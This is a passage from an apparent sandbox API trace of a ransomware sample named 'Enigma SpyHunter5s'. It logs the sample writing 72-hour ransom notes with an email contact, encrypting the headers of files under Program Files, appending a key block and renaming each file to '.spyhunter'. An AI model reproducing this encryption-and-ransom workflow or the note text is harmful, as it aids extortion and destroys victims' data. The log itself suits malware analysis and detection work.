dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0179.236] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.236] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce24b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce374, lpOverlapped=0x0 | out: lpBuffer=0x25ce24b*, lpNumberOfBytesWritten=0x25ce374*=0x127, lpOverlapped=0x0) returned 1 [0179.237] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.237] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce374, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce374*=0x2ac, lpOverlapped=0x0) returned 1 [0179.237] CloseHandle (hObject=0xb0) returned 1 [0179.237] GetProcessHeap () returned 0x2c0000 [0179.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7f8b0 | out: hHeap=0x2c0000) returned 1 [0179.238] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce310 | out: pbBuffer=0x25ce310) returned 1 [0179.238] GetProcessHeap () returned 0x2c0000 [0179.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.238] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce308*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce308*=0x30) returned 1 [0179.238] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1040\\hxdsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0179.238] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll") returned 77 [0179.238] StrStrW (lpFirst="hxdsui.dll", lpSrch=".txt") returned 0x0 [0179.238] GetProcessHeap () returned 0x2c0000 [0179.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.238] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce2cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce2cc*=0x2800, lpOverlapped=0x0) returned 1 [0179.304] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.304] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce2cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce2cc*=0x2800, lpOverlapped=0x0) returned 1 [0179.304] GetProcessHeap () returned 0x2c0000 [0179.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.304] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.304] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce30c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce2cc, lpOverlapped=0x0 | out: lpBuffer=0x25ce30c*, lpNumberOfBytesWritten=0x25ce2cc*=0x4, lpOverlapped=0x0) returned 1 [0179.553] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce2cc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce2cc*=0x30, lpOverlapped=0x0) returned 1 [0179.554] CloseHandle (hObject=0xb0) returned 1 [0179.554] GetProcessHeap () returned 0x2c0000 [0179.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.554] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll.spyhunter") returned 87 [0179.554] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1040\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1040\\hxdsui.dll.spyhunter")) returned 1 [0179.555] GetProcessHeap () returned 0x2c0000 [0179.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.555] GetProcessHeap () returned 0x2c0000 [0179.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.556] GetProcessHeap () returned 0x2c0000 [0179.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee8030 | out: hHeap=0x2c0000) returned 1 [0179.556] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1028\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0179.557] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.557] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce243*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce36c, lpOverlapped=0x0 | out: lpBuffer=0x25ce243*, lpNumberOfBytesWritten=0x25ce36c*=0x127, lpOverlapped=0x0) returned 1 [0179.558] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.558] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce36c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce36c*=0x2ac, lpOverlapped=0x0) returned 1 [0179.558] CloseHandle (hObject=0xb0) returned 1 [0179.558] GetProcessHeap () returned 0x2c0000 [0179.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7f4f0 | out: hHeap=0x2c0000) returned 1 [0179.558] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce308 | out: pbBuffer=0x25ce308) returned 1 [0179.558] GetProcessHeap () returned 0x2c0000 [0179.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.559] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce300*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce300*=0x30) returned 1 [0179.559] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1028\\hxdsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0179.560] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll") returned 77 [0179.560] StrStrW (lpFirst="hxdsui.dll", lpSrch=".txt") returned 0x0 [0179.560] GetProcessHeap () returned 0x2c0000 [0179.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0179.560] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce2c4*=0x2800, lpOverlapped=0x0) returned 1 [0179.584] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.584] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce2c4*=0x2800, lpOverlapped=0x0) returned 1 [0179.584] GetProcessHeap () returned 0x2c0000 [0179.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0179.584] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.584] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce304*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce2c4, lpOverlapped=0x0 | out: lpBuffer=0x25ce304*, lpNumberOfBytesWritten=0x25ce2c4*=0x4, lpOverlapped=0x0) returned 1 [0179.636] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce2c4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce2c4*=0x30, lpOverlapped=0x0) returned 1 [0179.645] CloseHandle (hObject=0xb0) returned 1 [0179.645] GetProcessHeap () returned 0x2c0000 [0179.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.645] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll.spyhunter") returned 87 [0179.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1028\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1028\\hxdsui.dll.spyhunter")) returned 1 [0179.646] GetProcessHeap () returned 0x2c0000 [0179.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.646] GetProcessHeap () returned 0x2c0000 [0179.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.646] GetProcessHeap () returned 0x2c0000 [0179.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee7c90 | out: hHeap=0x2c0000) returned 1 [0179.646] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce308 | out: pbBuffer=0x25ce308) returned 1 [0179.646] GetProcessHeap () returned 0x2c0000 [0179.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.646] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce300*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce300*=0x30) returned 1 [0179.646] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaucheck.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0179.647] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe") returned 69 [0179.647] StrStrW (lpFirst="jaucheck.exe", lpSrch=".txt") returned 0x0 [0179.647] GetProcessHeap () returned 0x2c0000 [0179.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0179.648] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce2c4*=0x2800, lpOverlapped=0x0) returned 1 [0179.847] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.847] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce2c4*=0x2800, lpOverlapped=0x0) returned 1 [0179.847] GetProcessHeap () returned 0x2c0000 [0179.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0179.847] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.847] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce304*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce2c4, lpOverlapped=0x0 | out: lpBuffer=0x25ce304*, lpNumberOfBytesWritten=0x25ce2c4*=0x4, lpOverlapped=0x0) returned 1 [0179.865] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce2c4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce2c4*=0x30, lpOverlapped=0x0) returned 1 [0179.865] CloseHandle (hObject=0xb0) returned 1 [0179.865] GetProcessHeap () returned 0x2c0000 [0179.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0179.865] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe.spyhunter") returned 79 [0179.865] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaucheck.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe.spyhunter" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaucheck.exe.spyhunter")) returned 1 [0179.866] GetProcessHeap () returned 0x2c0000 [0179.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0179.866] GetProcessHeap () returned 0x2c0000 [0179.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.866] GetProcessHeap () returned 0x2c0000 [0179.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b2b0 | out: hHeap=0x2c0000) returned 1 [0179.866] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce300 | out: pbBuffer=0x25ce300) returned 1 [0179.867] GetProcessHeap () returned 0x2c0000 [0179.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.867] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2f8*=0x30) returned 1 [0179.867] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\de_de\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0179.867] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg") returned 79 [0179.867] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.867] GetProcessHeap () returned 0x2c0000 [0179.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0179.867] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce2bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce2bc*=0x15d, lpOverlapped=0x0) returned 1 [0179.868] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.868] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x25ce2bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce2bc*=0x15d, lpOverlapped=0x0) returned 1 [0179.868] GetProcessHeap () returned 0x2c0000 [0179.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.868] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.868] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce2fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce2bc, lpOverlapped=0x0 | out: lpBuffer=0x25ce2fc*, lpNumberOfBytesWritten=0x25ce2bc*=0x4, lpOverlapped=0x0) returned 1 [0179.869] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce2bc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce2bc*=0x30, lpOverlapped=0x0) returned 1 [0179.869] CloseHandle (hObject=0xb0) returned 1 [0179.869] GetProcessHeap () returned 0x2c0000 [0179.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0179.869] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.869] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\de_de\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\de_de\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.870] GetProcessHeap () returned 0x2c0000 [0179.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0179.870] GetProcessHeap () returned 0x2c0000 [0179.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.870] GetProcessHeap () returned 0x2c0000 [0179.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e74268 | out: hHeap=0x2c0000) returned 1 [0179.870] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\da_dk\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0179.870] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.870] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce233*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce35c, lpOverlapped=0x0 | out: lpBuffer=0x25ce233*, lpNumberOfBytesWritten=0x25ce35c*=0x127, lpOverlapped=0x0) returned 1 [0179.871] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.871] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce35c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce35c*=0x2ac, lpOverlapped=0x0) returned 1 [0179.871] CloseHandle (hObject=0xb0) returned 1 [0179.871] GetProcessHeap () returned 0x2c0000 [0179.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e74180 | out: hHeap=0x2c0000) returned 1 [0179.872] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2f8 | out: pbBuffer=0x25ce2f8) returned 1 [0179.872] GetProcessHeap () returned 0x2c0000 [0179.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.872] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2f0*=0x30) returned 1 [0179.872] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\da_dk\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0179.872] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg") returned 79 [0179.872] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.872] GetProcessHeap () returned 0x2c0000 [0179.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0179.872] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce2b4*=0x15d, lpOverlapped=0x0) returned 1 [0179.873] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.873] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x25ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce2b4*=0x15d, lpOverlapped=0x0) returned 1 [0179.873] GetProcessHeap () returned 0x2c0000 [0179.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.873] SetFilePointerEx 